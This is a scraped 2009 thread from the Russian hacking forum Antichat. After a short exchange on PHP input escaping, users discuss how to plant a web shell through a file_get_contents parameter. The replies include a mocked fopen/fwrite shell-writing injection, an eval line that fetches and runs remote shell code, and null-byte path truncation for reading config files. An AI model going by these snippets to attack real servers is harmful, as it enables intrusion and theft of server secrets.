Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

01.02.2009, 02:09
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме: 3244717
Репутация:
1980
|
|
Сообщение от Qam
Фильтрация таким образом не повличет ли за собой уязвимости?
$style_text = htmlspecialchars(trim($HTTP_POST_VARS['style_text']));
если имеется в виду XSS, то нет. Но если $style_text впоследствии попадает в SQL-запрос, то фильтрация с помощью htmlspecialchars() не спасет от SQL-инъекций. Используй mysql_(real_)*escape_string()
|
|
|

01.02.2009, 02:35
|
|
Banned
Регистрация: 22.12.2007
Сообщений: 660
Провел на форуме: 3885269
Репутация:
1158
|
|
На сервере есть функция:
file_get_contents(./docs/danger $str /body.html) //как то так.
Можно ли как нибудь залить шелл? Имея доступ к $str?
|
|
|

01.02.2009, 02:42
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме: 3244717
Репутация:
1980
|
|
file_get_contents() читает файлы, но не записывает
|
|
|

01.02.2009, 02:56
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме: 6075534
Репутация:
2731
|
|
procedure, попробуй так (не уверен).
PHP код:
$str=");$f=fopen('shell.php','a+');fwrite($f,'<? shellcode ?>')//";
file_get_contents(./docs/danger $str /body.html);
Если не стоит htmlspecialchars, получится вида
PHP код:
file_get_contents(./docs/danger );$f=fopen('shell.php','a+');fwrite($f,'<? shellcode ?>')// /body.html);
|
|
|

01.02.2009, 03:01
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме: 6722038
Репутация:
1385
|
|
Сообщение от mailbrush
procedure, попробуй так (не уверен).
PHP код:
$str=");$f=fopen('shell.php','a+');fwrite($f,'<? shellcode ?>')//";
file_get_contents(./docs/danger $str /body.html);
Если не стоит htmlspecialchars, получится вида
PHP код:
file_get_contents(./docs/danger );$f=fopen('shell.php','a+');fwrite($f,'<? shellcode ?>')// /body.html);
чо, с ума сошёл?
оч смешно .. за шутку +5
----
2 procedure
если можно юзать нулевой байт, можно прочитать интересные файлы, в том числе возможно и конф итд .. а там и до шелла недалеко..
конечно это смотря что происходит с этим file_get_contents, если выводится итд, то гут..
Последний раз редактировалось 159932; 01.02.2009 в 03:05..
|
|
|

01.02.2009, 03:08
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме: 1404552
Репутация:
568
|
|
procedure
PHP код:
<?php eval(file_get_contents("http://путь.до/шелла/без_символов_открытыя_кода"));?>
?
|
|
|

01.02.2009, 03:09
|
|
Banned
Регистрация: 22.12.2007
Сообщений: 660
Провел на форуме: 3885269
Репутация:
1158
|
|
mailbrush
)))
конечно это смотря что происходит с этим file_get_contents, если выводится итд, то гут..
Все на страницу выводится, параметр get. А где можно прочитать про null байт?
sabe бля сегодня день рождения у webkillá что все ведут себя так? )
|
|
|

01.02.2009, 03:10
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме: 9220514
Репутация:
3338
|
|
%00
просто отрезает то, что после него идет
|
|
|

01.02.2009, 03:11
|
|
Banned
Регистрация: 22.12.2007
Сообщений: 660
Провел на форуме: 3885269
Репутация:
1158
|
|
./docs/danger\0/body.html
- от такая хня получается(
|
|
|

01.02.2009, 03:11
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме: 6722038
Репутация:
1385
|
|
Сообщение от sabe
procedure
PHP код:
<?php eval(file_get_contents("http://путь.до/шелла/без_символов_открытыя_кода"));?>
?
а это что ещё???
там что, сказано что этот file_get_contents исполняется? там макс что можно, это прочитать файлы.. если хватит конфигов, да и если вывод есть..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|